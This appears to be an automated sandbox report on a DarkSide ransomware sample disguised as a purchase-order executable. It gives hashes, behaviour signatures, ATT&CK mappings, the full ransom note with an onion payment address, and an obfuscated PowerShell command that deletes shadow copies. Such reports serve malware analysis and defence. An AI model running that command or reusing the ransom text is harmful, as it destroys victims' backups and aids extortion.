Overview

overview

10

Static

static

8

PurchaseOr...in.exe

windows7_x64

10

PurchaseOr...in.exe

windows10_x64

10

Resubmissions

01-10-2021 10:21

211001-mdsx1sbeej 10

04-08-2021 18:10

210804-g5g9vvd77a 10

Analysis

  • max time kernel
    37s
  • max time network
    81s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-08-2021 18:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PurchaseOrderPoster.bin.exe

  • Size

    30KB

  • MD5

    f00aded4c16c0e8c3b5adfc23d19c609

  • SHA1

    86ca4973a98072c32db97c9433c16d405e4154ac

  • SHA256

    4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a

  • SHA512

    a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.f2cbf9aa.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 18 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:916
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:936

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    33e42934d49a01d00c2f656779ab39d0

    SHA1

    b0948a8ae1ea8366fd8f937b312261bc07dfaa93

    SHA256

    b0666e4e1732399e09d1e053de280ace5426e52eb5b212d023e6e7999a7ec542

    SHA512

    90fe2726a2e9d8a721e698343c83c2d5b03be65fda52506d14a530bb1d8a03a2415dbee22dd96d35e4e0045a4bd360dee97354ef47de9e5d7ab5db1a1c1a8771

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    412607a2f0f0a4a33ae00c4f5e887ce0

    SHA1

    67cb09380ea4efd2c819ba95e3acc13a3bd96e16

    SHA256

    398901c2bc541fea59b18686b97154e5fea02d3f2ce32ca9a494239c250ffa8c

    SHA512

    dbddcb177a2c50a80409481f44b949b4f970726994cd2feef067da5606799ce89dd64f186a98355104b0c2066823c1960d965c01231f83dc3d46266c39b9ec69

    Download Submit
  • memory/916-65-0x00000000025E0000-0x00000000025E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-62-0x0000000002350000-0x0000000002351000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-63-0x000000001AD00000-0x000000001AD01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-64-0x0000000002430000-0x0000000002431000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-66-0x000000001AC80000-0x000000001AC82000-memory.dmp
    Filesize

    8KB

    Download
  • memory/916-67-0x000000001AC84000-0x000000001AC86000-memory.dmp
    Filesize

    8KB

    Download
  • memory/916-68-0x000000001C4D0000-0x000000001C4D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-69-0x000000001C5A0000-0x000000001C5A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/916-61-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/916-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1696-59-0x0000000075211000-0x0000000075213000-memory.dmp
    Filesize

    8KB

    Download